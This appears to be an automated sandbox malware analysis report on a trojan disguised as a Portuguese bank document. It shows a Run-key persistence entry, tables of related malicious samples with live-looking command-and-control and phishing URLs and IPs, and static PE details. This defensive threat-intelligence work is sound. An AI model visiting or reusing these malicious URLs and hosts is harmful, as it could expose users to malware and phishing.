                                                                                                                                                                                                      • Enable AMSI

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      14:11:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OZSDUXDPZD C:\Program Files (x86)\Lk00t\r2d0wlsh6llpwbmx.exe
                                                                                                                                                                                                      14:11:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OZSDUXDPZD C:\Program Files (x86)\Lk00t\r2d0wlsh6llpwbmx.exe

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                      185.53.179.92bena.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.invisibleteethalignersaus.com/s5hr/
                                                                                                                                                                                                      xDG1WDcI0o.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.privatejetsthai.com/imnt/?w4=UNoNpJIiMLZbORoiUFAigYoBDUW42C9ldKqRaMNOnj5d1SkbdJS2E2Rpoq6k4m+IN1ux&nHNxLR=Q48l
                                                                                                                                                                                                      DHL-Waybill.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.cruisebookingsonlineukweb.com/b5ce/?e6G8DT=ubyRDwWnPh2y+3rlGlNOSBrIMI9kdlE/Fha9QBr5+NAGLK2L6Tgkw+HdIrZkbZr4p8vL&Y2M=2d-xPvVhn4RXklQ
                                                                                                                                                                                                      Inquiry Urgent Grupo Dani Chile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.cruisebookingsonlineukweb.com/b5ce/?_H=ubyRDwWnPh2y+3rlGlNOSBrIMI9kdlE/Fha9QBr5+NAGLK2L6Tgkw+HdIo1eYYHDqLOaq9Cjjg==&1bHXKB=MPLdBHEh52ZHYR
                                                                                                                                                                                                      Nueva orden de investigaci#U00f3n de Desppo.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.cruisebookingsonlineukweb.com/b5ce/?jHedL=ubyRDwWnPh2y+3rlGlNOSBrIMI9kdlE/Fha9QBr5+NAGLK2L6Tgkw+HdIrZkbZr4p8vL&GvFLR=KN64Dj
                                                                                                                                                                                                      Peq0Amq9EP.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.privatejetsthai.com/qs23/?5jOl7vcx=CNX4AFRfP0h7ChEnGTthJqK3to2cL0mZYG/GXFEFCogFx4nP0+hMpM5L1IyclfKmKFsBZxPSAg==&m6A=hl8hup_P5x
                                                                                                                                                                                                      sprogr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.salvaescalerasarnet.com/myec/?TBZh=2fzjMoKczaWkZ6pPxejUg8Ei+nmQRroQP+eVdjSZERkHOTAAzM106mE8qLSFBZe84VxE&-Z68=3fo0sXFHBDotf
                                                                                                                                                                                                      23.227.38.74Drawings and artwork.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.uneeqlymade.com/mqni/?2dcp=Ozx5Xi8qoG7eQjCl7pdR6FH54nJ4gSe9vgc0Lw43a0yZck+bPIzUF6kBMGhoYfJBqvIL&4hKPv8=6lStzhcXHPmhjhtP
                                                                                                                                                                                                      Conpamy Profile.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.mlune.com/ne5f/?7n=6lnXz&p48dB=GkF7gkYlpwm2PkWJi9giQetanoKdVUXxVjl+Y8CJFlSZ21auaKgFYV+3GaNx1EL23/AL
                                                                                                                                                                                                      njUIPPVrud.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.nelvashop.com/wn19/?gP=74kz/+Omydv/tJV+ps5/T47bI5nxKh+DjdkrvIsUcwHn/m5f3NJjyQUUG1A7gP1GNjyQ&5jaXq=t0GdqZupcnl4uJDP
                                                                                                                                                                                                      SK034252562672.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.boardsandbeamsdecor.com/euv4/?hV2XJ2Q=vko974XOxwnRXT9jLEv3OkMzdfNnydxLjvDFpz2gkbe4xk485cFYNUs71ryfnXxl50TW&8pxXE=8p5TnTGPX
                                                                                                                                                                                                      INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.aprlegocrushipp.sbs/m29n/?A6kt=GK2TvQwOYZSLyu9mZVPp1m+CQv7V3M/z9My4Q+FV19xHIkzGGOOnHUY67SV5MQMQor45&Tn=EdrhQj_p
                                                                                                                                                                                                      DHL SHIPMENT NOTIFICATION 1146789443.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.keilaniclothing.com/amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU
                                                                                                                                                                                                      SecuriteInfo.com.Variant.Jaik.72878.4306.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.deohgy.com/x7fi/?XV=2dyPen_pHl_x&m8F=efZWEojGtW5iMNPlHYZjNMX3TooIlOlKc4xUQLu+Byk1UhcSsg7BIt1H1VqZN2xCIaIE
                                                                                                                                                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.thissunshinyday.com/d23n/?4hkPkHmh=oAxm1Jph1Tun0blpQJdjg/SK6qGfgZ8cpI/ch5tkgrqA0k0NKGF3+6K/eQ1LrU5D/cry&b2Jlwz=YnBDMHZpAzVXFjA
                                                                                                                                                                                                      aSsc9zh1ex.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.threads34.store/wn19/?jZf=rv1HgXCmNvTRWnk0t/PWMZTArWSxwY6VToXu23C5wd0SYVqo5hbnUnFufPtPTohMYlmc&k0=p8cH
                                                                                                                                                                                                      Potvrda ponude.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.rematedeldia.com/euv4/?-Zkp3=RhL0S&3f8tLtj=E+AdldMsUtuIxZV3GzeilCEOXtaM5yG6oWVR/2hlbhe5LZ2inqV2BFV3XKjFhXHrxoEt
                                                                                                                                                                                                      2u2DWOubvh.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.green-quality-isr.com/sm3g/?Ujlp=PMsZESdofcdfXXm7otNvxqMEGQjwc7ZgGC69D5HZtF2nNtkl2ZL5b/zciDReNSeLA9iJ&1b8X=vL0hT
                                                                                                                                                                                                      WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.nelvashop.com/wn19/
                                                                                                                                                                                                      New order for customer 99009141.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.sundayscompany.online/s0r7/?zhiPpdk=ZOHcDS/VoRL8NhF+NTNMAieI0E4uHoviIdLvhZxnb0fT8sGuyHwnt94dFecSp4VbabNYLw==&C8udn=0fdDUL908dxl
                                                                                                                                                                                                      Docs advice copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.pmpboutique.com/gt53/?sX=fFHodkbaNDvdv7oiPDPBLvQa76oY89bN2/bpamu9khvKSLTpx9uxAAOQYYoTTn+sNUOP&9rN0g=iZRXo
                                                                                                                                                                                                      SecuriteInfo.com.W32.AIDetectNet.01.21900.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.rollingstrollers.com/nd04/?pV08qv=7nrXP8lxbd&5j=l1IJrOgng8yVltsGeGHnDln+8V/8o58rojbxcfWDQZIkck1PQu51S7LVlrT3qI/mW37I
                                                                                                                                                                                                      NEW ORDER #00980.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.originalflamehumidifier.com/hpmw/?NViP5Vq8=iTviYglo0CrHM7nbewykO+47tekiRS7eipmJHPQTDc0EORtNZSrxZa0rbY2iqpvX/Dc4&9rV0d=iZPtS0Sxdh
                                                                                                                                                                                                      Yeni sipari#U015f _WJO-001.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.sapinou.com/apju/?0L3d9=RBoufo6dMO3sAZ9NBTm7jUfApJp+q3UDH1aHOxBdXrjMN0ARdrEfPXnAjDDptZepWsu3rOBPGA==&EXYx=KHMt_Nnh3TmtEby0
                                                                                                                                                                                                      PLIST8985.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.tzbcollections.com/tee5/?6l=HZfyqkOMaxI86340C6FwN5PErLC/ISxm8OEl9G9ih0M/I9Nv7DNlFxXxbxXb6YKuESuU&zVqLWr=Td-LTVDP
                                                                                                                                                                                                      dr053I4HK8.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.hallowseason.com/s2q8/?DN90gFjp=IP27paXDDXneFHSCWmd6AadpeBEtcWEpI/OT+vwCmhsDApZt1gdbnCKmAuXyoF3orSGW&n6S8Hz=BR-Lut
                                                                                                                                                                                                      payment.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • www.innovarecic.com/3e9r/?Wh=/tL8uK1iYcuieaEf5cU8mJl/dtQi3x61n0Fc3d8s1MHNXfqkiyPTGpiXh5zgjr6DuccX&oD=0buD_D

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                      www.abtys6.onlineiqM872r4iu.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 188.114.96.10
                                                                                                                                                                                                      www.rkhubs.comhJyWzS4AWx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 154.204.236.66
                                                                                                                                                                                                      www.ginas4t.comRewdsccVjn.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 45.82.73.217
                                                                                                                                                                                                      bWFqrKmWuG.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 45.82.73.217
                                                                                                                                                                                                      ytc5axd6.n.cnamexingzuoy.comtriage_dropped_file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 156.251.170.8
                                                                                                                                                                                                      parkingpage.namecheap.comEnquiry 220519.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                                      QTE00038319.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                                      dn8n8jccM0Jwgrg.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                                      njUIPPVrud.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                                      SWD0004 PO06350.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                                      SK034252562672.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.218
                                                                                                                                                                                                      payment advice_007100013.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.217
                                                                                                                                                                                                      factura pendiente de pago pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                                      Payment Advice.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.217
                                                                                                                                                                                                      UST84791.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                                      Purchase Order.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                                                      iuvRyl9i7D.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.216
                                                                                                                                                                                                      DL03327INV.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                                      inlaww321345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                                      Notificaci#U00f3n de pago.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.212
                                                                                                                                                                                                      Advice FTT5378393.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                                      Reference Note PJS-4010036-Ref 18976.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.211
                                                                                                                                                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.215
                                                                                                                                                                                                      SecuriteInfo.com.Variant.Jaik.72878.8629.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.217
                                                                                                                                                                                                      ORDERS_S.EXEGet hashmaliciousBrowse
                                                                                                                                                                                                      • 198.54.117.217

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                      TEAMINTERNET-ASDEbank_payment-doc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      SC51072208.jsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.172
                                                                                                                                                                                                      fr34veeTGm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      zRQuHKbY4V.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.172
                                                                                                                                                                                                      payment copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      RC_Pile1314.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      myp0912.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.178.30
                                                                                                                                                                                                      PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      product Enquiry.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.174
                                                                                                                                                                                                      SecuriteInfo.com.Variant.Jaik.72878.26519.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.93
                                                                                                                                                                                                      SecuriteInfo.com.Variant.Jaik.72878.19052.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.170
                                                                                                                                                                                                      http://blindsignals.com/index.php/2009/07/jquery-delayGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.177.50
                                                                                                                                                                                                      nuevo pedido.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.174
                                                                                                                                                                                                      WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      WWVN_INVOICE_8363567453.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.170
                                                                                                                                                                                                      http://blindsignals.com/index.php/2009/07/jquery-delay/Get hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.177.50
                                                                                                                                                                                                      PRO.INV.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.171
                                                                                                                                                                                                      http://www.hubookstore.comGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.178.30
                                                                                                                                                                                                      Bill of Lading.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.172
                                                                                                                                                                                                      Bftkdpihzmqqayhvbimrsgovwrhmxmgnqx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 185.53.179.170
                                                                                                                                                                                                      CLOUDFLARENETUSDrawings and artwork.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 23.227.38.74
                                                                                                                                                                                                      Nr_SC0551923.jsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 66.235.200.145
                                                                                                                                                                                                      https://flixsterz.com/Officesharelive/index.phpGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.18.10.207
                                                                                                                                                                                                      https://kafka.apache.org/downloadsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.17.24.14
                                                                                                                                                                                                      https://mail.mypinata.cloud/ipfs/Qma1n65AAwU7DB4i8mtiLiCCbctnTzia319dniaq4gUCHw#comercial@addinformatica.comGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                      https://sites.google.com/view/ghhf-file/homeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 172.66.40.119
                                                                                                                                                                                                      https://thirdgoddess.com/NjCy4--gWzO255Le--Q2SvRB/e1lde5N--SH5gW--KjrZjfn5/index.html#uashelp@faa.govGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.18.11.207
                                                                                                                                                                                                      https://docs.google.com/presentation/d/e/2PACX-1vToJ2skEUVJcX0uyT8w18aLeWIEJm2TnFEDAqzuSaCjknRYaXO_frUKUwKat2CllcQ05yPAVitOALt_/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousBrowse
                                                                                                                                                                                                      • 172.67.191.175
                                                                                                                                                                                                      SecuriteInfo.com.W32.AIDetect.malware2.18832.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 162.159.134.233
                                                                                                                                                                                                      https://nftstorage.link/ipfs/bafybeicqmrk2elbe4sqqnlb7re5ad4t5fmhahgy2hedjbbk6dctwdr4pvmGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.17.25.14
                                                                                                                                                                                                      SWIFT USD 35.150.00 - 220519__9980001.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 162.159.129.233
                                                                                                                                                                                                      NSC0551923.jsGet hashmaliciousBrowse
                                                                                                                                                                                                      • 172.67.140.71
                                                                                                                                                                                                      Enquiry 220519.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      • 188.114.96.10
                                                                                                                                                                                                      https://click.snapchat.com/aVHG?pid=apchat_download_page&af_dp=http://38333.google.com&af_web_dp=https://sugarbabesjewelry.com/ret/?e=bmVib2pzYS5vYnJhZG92aWNAaG9sbWdyZW5zYmlsLnNlGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.18.11.207
                                                                                                                                                                                                      HLNGQDZK.EXEGet hashmaliciousBrowse
                                                                                                                                                                                                      • 162.159.133.233
                                                                                                                                                                                                      REVISEDINV-478372REQUEST95PAY3- PDF.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.17.24.14
                                                                                                                                                                                                      hpt08jF0GMGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.29.0.136
                                                                                                                                                                                                      https://www.codeply.com:443/v/Cx18i7z38M/Get hashmaliciousBrowse
                                                                                                                                                                                                      • 104.18.11.207
                                                                                                                                                                                                      https://t-b3g.club/?e=emmari@datacom.co.nzGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.18.11.207
                                                                                                                                                                                                      https://secure-portal.seal-software.com/webclient/Login.xhtml/ResetPassword.xhtmlGet hashmaliciousBrowse
                                                                                                                                                                                                      • 104.16.85.5

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Document de bancobpi_66473474.exe.log

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Document de bancobpi_66473474.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):700
                                                                                                                                                                                                      Entropy (8bit):5.346524082657112
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKharkvoDLI4MWuCt/DLI4M/P:ML9E4Ks2wKDE4KhK3VZ9pKhIE4KoLE40
                                                                                                                                                                                                      MD5:E2CB12F31A124AF16075420C5CEFE268
                                                                                                                                                                                                      SHA1:2F2EF20848D10CBDBCB9D50B0FE28CF42803FAA0
                                                                                                                                                                                                      SHA-256:4165AF7A0E547DB440BE9F9FB69ACB1A6FCC854BC04168E5295E12171C1C9CD9
                                                                                                                                                                                                      SHA-512:6434C9742EF45E80F18BFD0B14054C5F8CB708F69FFFFFF95ACF7E32509689FFDFDA431E3AC5970FFC9AFF3676597BE91384160456AFF0E16C59C94E47120AAA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):6.162736392982006
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                                                                                                      File name:Document de bancobpi_66473474.exe
                                                                                                                                                                                                      File size:3044864
                                                                                                                                                                                                      MD5:5888637a68b3b9148ecca46cad771d0a
                                                                                                                                                                                                      SHA1:837f9af554f72a9d7fd6863ef6c01a6bc38cfee5
                                                                                                                                                                                                      SHA256:4de7c33ddb30a012b6738c828d89661d07440f173445c072042708f7a63990d7
                                                                                                                                                                                                      SHA512:4d734a579d5db27b948c42b4adaa575b120f4fb4d4ea4cd34399d40c7d3aa354a751239ecb2a3f8c910eb6415b752b51ecba3797005bb6d5498649546faba102
                                                                                                                                                                                                      SSDEEP:49152:WDqmFyscapb49XJXofaSNT7w+O9UcZJSYpXUjXmDyhC1lVZeC/2gQ99bEBu4X1Yj:RtJf2g/pFb7d8+DNWs4q6nh
                                                                                                                                                                                                      TLSH:6CE5085C7EB48910D3AD36F6DFE60750C3B2AC961B21C7496A7F36552832243EC9A31E
                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.................0..g..h............ ........@.. ....................................`................................

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:00828e8e8686b000

                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Entrypoint:0x6e8793
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                                                                                                      Time Stamp:0x8CD51163 [Mon Nov 14 22:04:19 2044 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
